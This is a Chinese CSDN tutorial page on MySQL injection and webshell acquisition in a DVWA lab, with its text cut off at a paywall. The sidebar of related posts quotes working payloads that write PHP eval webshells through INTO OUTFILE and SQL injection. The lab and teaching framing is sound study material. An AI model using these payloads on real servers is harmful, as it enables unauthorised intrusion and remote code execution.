深入理解MySQL安全(二)-数据库权限和webshell

已于 2023-02-15 20:10:02 修改
阅读量165 收藏
点赞数
分类专栏: 渗透测试提升之道 文章标签: 网络安全 数据库 安全 mysql
于 2023-02-13 21:12:44 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zhujiu_fu/article/details/128998314
版权

前言

我们在深入理解MySQL安全(中)-数据库权限中讲解了,MySQL注入发生的原理。核心就是:

MySQL注入 = 语法构造 + 语法封闭

在渗透过程中,如果发现了注入,下一个工作就要开始尝试获取web shell了。

在本内容部分,将讲解如何获取web shell,以及获取web shell的原理是什么。

提出一个问题,可以带着问题去阅读,发现注入就一定能得到web shell吗。这里面就要涉及到数据库的权限,理解了数据库权限,如何获取web shell也就水到渠成了。

一、sqlmap 渗透测试-拖库

前提:按照DVWA官方建议,按照官方的推荐配置了环境(WAMP环境),如果环境还未跑起来,建议初学者先去配置下这一块。

1. 在DVWA环境下,使用sqlmap对DVWA low security 版本进行注入测试。

执行注入测试的时候,得到了如下信息:

从图中,我们可以看到,已经获得了数据库的用户名和秘钥--root, root。

2. 如何登录主

了解本专栏 订阅专栏 解锁全文 超级会员免费看
zhujiu_fu
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
订阅专栏
linux mysql webshell_通过MySQL写入webshell的几种方式
weixin_39785723的博客
01-28 336
在实际写webshell的时候,我们经常会遭受到secure_file_priv的阻拦,secure_file_priv这个配置参数用来限制load data、outfile、load_file()的使用,其参数值有以下三种:1、NULL:表示不允许导入导出3、空,即没有具体值:表示不对导入导出做限制可使用如下命令来查看secure_file_priv的值:show global variable...
提权学习 -- 使用 mysql 拿到 webshell
LuckyToMeet-Dian叶
06-14 848
注意 如造成一切损失,与本人无关! 工具准备 scanPort 端口扫描工具,用于扫描内网中开放的端口。 dirBuster 网站目录扫描工具,用于扫描网站的目录已经 URL,暴力破解方式,可能会把服务器弄崩(电脑不咋地的情况)。 提权前提 对方需要开启服务器,且需要知道服务器在宿主机上的绝对路径 知道其 mysql 用户名和密码 mysql 有读写权限,可以向服务器开放目录写木马文件。 有上...
Mysql写入webshell两种方法总结-- into outfile,导入日志
qq_45730325的博客
05-19 3560
Mysql写入webshell
mysql(弱密码导致webshell)
信安是不可或缺的一部分!
10-24 273
使用扫描器扫出弱密码,连接数据库,然后植入木马,建立shell
利用mysqlwebshell_mysqlwebshell总结
weixin_36121198的博客
02-05 130
php eval($_POST[jumbo])?>‘ into outfile ‘/var/www/jumbo.php‘;2、select ‘‘ into dumpfile ‘/var/www/jumbo.php‘;3、Drop TABLE IF EXISTS temp;Create TABLE temp(cmd text NOT NULL);Insert INTO temp (cmd) V...
网络安全-负载均衡下的webshell连接
最新发布
01-27
网络安全-负载均衡下的webshell连接
网络安全-渗透中的权限维持-杨晓成-360
02-01
网络安全-渗透中的权限维持-杨晓成-360-下载版 权限维持 Windows相关 Linux相关 中间件 webshell
webshell-dictionary-master 上千个webshell合集
09-29
webshell就是以asp、php、jsp或者cgi等网页文件形式存在的一种代码执行环境,也可以将其称做为一种网页后门。黑客在入侵了一个网站后,通常会将asp或php后门文件与网站服务器WEB目录下正常的网页文件混在一起,然后...
php-fpm:用WebShell攻击PHP-FPM用WebShell攻击PHP-FPM
03-11
可以实现任意代码执行后续用单文件PHP实现一个FastCgi Client,然后已知PHP文件就用WebShell本身,没有什么骚操作的话WebShell应该就是免杀的使用测试php7.3-fpm,在TCP模式和本地socket都可以运行echo "<...
MySQLWebShell总结
Poolhuang的博客
05-27 423
1、写入方式 ①、基于outfile写入 union select 例:?id=1 union select '<?php phpinfo() ?>' into outfile '物理路径' ; ###利用分隔符写入 lines terminated by ::设置每行结尾的字符,可以为单个或多个字符,默认值为‘\n’;可以理解为 以每行终止的位置添加 xx 内容。 例:?id=1 into outfile '物理路径' lines terminated by '<?php .
MySQL导出一句话拿WebShell的方法
06-19
MySQL导出一句话拿WebShell的方法
MySQL弱密码和webshell
qq_44312507的博客
12-17 1730
MySQL弱密码和webshell问题文档 一、了解漏洞 1、mysql是什么 MySQL 是最流行的关系型数据库管理系统,在 WEB 应用方面 MySQL 是最好的 RDBMS(Relational Database Management System:关系数据库管理系统)应用软件之一。 关系数据库管理系统(Relational Database Management System:RDBMS)...
通过MySQL写入webshell的几种方式(小宇特详解)
小宇的web博客
08-07 4990
通过MySQL写入webshell的几种方式 -01-通过outfile写入shell 利用条件 1.root权限2.网站的绝对路径且具有写入权限,能够使用into outfile和into dumpfile来进行写入。 这里用了以下的shell union select 1,"<?php eval($_REQUEST[8])?>" into outfile 'C:/phpStudy/WWW/4448.php' 这里连接蚁剑 -02-将shell写入表中 利用条件 1.root权限2.网站
利用SQL注入上传木马拿webshell
D1stiny的博客
05-25 1831
学到了一种操作,说实话,我从来没想过还能这样 正常情况下,为了管理方便,许多管理员都会开放MySQL数据库的secure_file_priv,这时就可以导入或者导出数据 当我如图输入时,就会在D盘创建一个名为123456.php,内容为<?php phpinfo();?>的文件 我们可以利用这一点运用到SQL注入中,从拿下数据库到拿下目标的服务器 比如我们在使用联合查询注入,正常是这样的语句http://xxx?id=-1 union select 1,'你想知道的字段的内容或查询语句',
WebShell简介
Karka_的博客
06-08 915
• JSP类型• ASP类型• PHP类型。
网络安全】SQL 注入新思维之 webshell 提权
zxcvbnmasdflzl的博客
12-24 824
大量的 hr 面试官都喜欢从 SQL 注入开始询问,所以留心了一下关于 SQL 注入的问题的频率。结果非常惊讶!不出意外的是--os-shell 名列榜首。比如这道题:SQL 注入 getshell 的方式?答:getshell 是指攻击者通过利用 SQL 注入获取系统权限的方法,Webshell 提权分两种:一是利用outfile 函数,另外一种是利用**--os-shell**;UDF 提权通过堆叠注入实现;MOF 提权通过"条件竞争"实现。
phpmyadmin后台4种拿shell方法及php爆路径收集
weixin_30367873的博客
08-31 1202
php后台拿shell要知道php的路径,文章下将讲诉爆php路径的方法!!! 方法一: CREATE TABLE `mysql`.`xiaoma` (`xiaoma1` TEXT NOT NULL ); INSERT INTO `mysql`.`xiaoma` (`xiaoma1` )VALUES ('<?php @eval($_POST[xiaoma])?>'); SE...
MySQL获取PHP webshell
qq_43592364的博客
01-18 2136
在渗透测试中,希望通过MySQL获取webshell需要满足以下几个条件: 1、对web目录有写权限 2、GPC关闭(是否对单引号进行转义) 3、知道服务器的绝对路径 4、secure-file-priv为打开的状态 至少要满足以上4个条件,才能顺利通过MySQL获取webshell 接下来,为了能够模拟出渗透这一个过程,使用dvwa靶场来进行模拟(当然相比于真正的时间,中间会省...
mysql权限用户getshell_GetShell的姿势总结
weixin_39571179的博客
12-21 1027
原文来自SecIN社区—作者:WiHat0x00 什么是WebShell渗透测试工作的一个阶段性目标就是获取目标服务器的操作控制权限,于是WebShell便应运而生。Webshell中的WEB就是web服务,shell就是管理攻击者与操作系统之间的交互。Webshell被称为攻击者通过Web服务器端口对Web服务器有一定的操作权限,而webshell常以网页脚本的形式出现。常见的WebShell使...
mysql数据库密码加密
07-25
在实际攻防过程中,如果能够获取Webshell,可以直接下载MYSQL数据库中的user.MYD文件。该文件中保存了MYSQL数据库中所有用户对应的密码。只要能够破解这些密码,就可以正常操作这些数据。\[2\] 研究MYSQL数据库的...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值